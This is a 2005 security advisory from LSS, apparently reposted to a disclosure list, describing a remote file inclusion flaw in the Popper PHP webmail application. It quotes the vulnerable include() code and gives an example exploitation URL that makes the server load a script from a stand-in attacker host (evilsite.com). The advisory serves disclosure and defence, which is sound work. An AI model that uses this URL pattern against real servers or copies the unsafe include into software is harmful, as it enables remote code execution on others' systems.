Popper webmail remote code execution vulnerability - advisory fix
Hi,
This advisory was already released on http://security.lss.hr, but there was a
mistake in advisory page that marked vulnerable PHP line as HTML tag, so it
wasn't
visible within web browser. That's why b0iler described it as a false positive
(http://lists.grok.org.uk/pipermail/full-disclosure/2005-June/034408.html).
I apologize for our mistake, here is fixed advisory.
----------------------------------------------------------------------------------
LSS Security Advisory #LSS-2005-06-07
http://security.lss.hr
Title: Popper webmail remote code execution vulnerability
Advisory ID: LSS-2005-06-07
Date: 2005-06-01
Advisory URL: http://security.lss.hr/index.php?page=details&ID=LSS-2005-06-07
Impact: Remote code execution
Risk Level: High
Vulnerability Type: Remote
Vendors Status: 7th March, 2005
==[ Overview
Popper is a webmail application written in PHP which allows users to read
and send their e-mail messages using a web browser.
==[ Vulnerability
Popper is vulnerable to remote code inclusion bug in childwindow.inc.php script
that can be abused to execute arbitrary code.
Vulnerable code in childwindow.inc.php:
--------
..
<?php
if(file_exists($form.".toolbar.inc.php")) {
include($form.".toolbar.inc.php");
}
?>
..
..
<?php include($form.".form.inc.php");?>
..
--------
To exploit this vulnerability, attacker has to put script like
test.form.inc.php
on www.evilsite.com HTTP server, and call url like this:
http://www.vulnsite.com/popper/childwindow.inc.php?form=http://evilsite.com/test
Vulnerability can be exploited only if register_globals in php.ini file is set
to 'on'.
==[ Affected Version
All popper versions including latest 1.41-r2.
==[ Fix
Set register_globals to off.
==[ PoC Exploit
No PoC needed.
==[ Credits
Credits for this vulnerability goes to Leon Juranic <ljuranic@xxxxxx>.
==[ LSS Security Contact
LSS Security Team,
WWW : http://security.lss.hr
E-mail : security@xxxxxx
Tel : +385 1 6129 775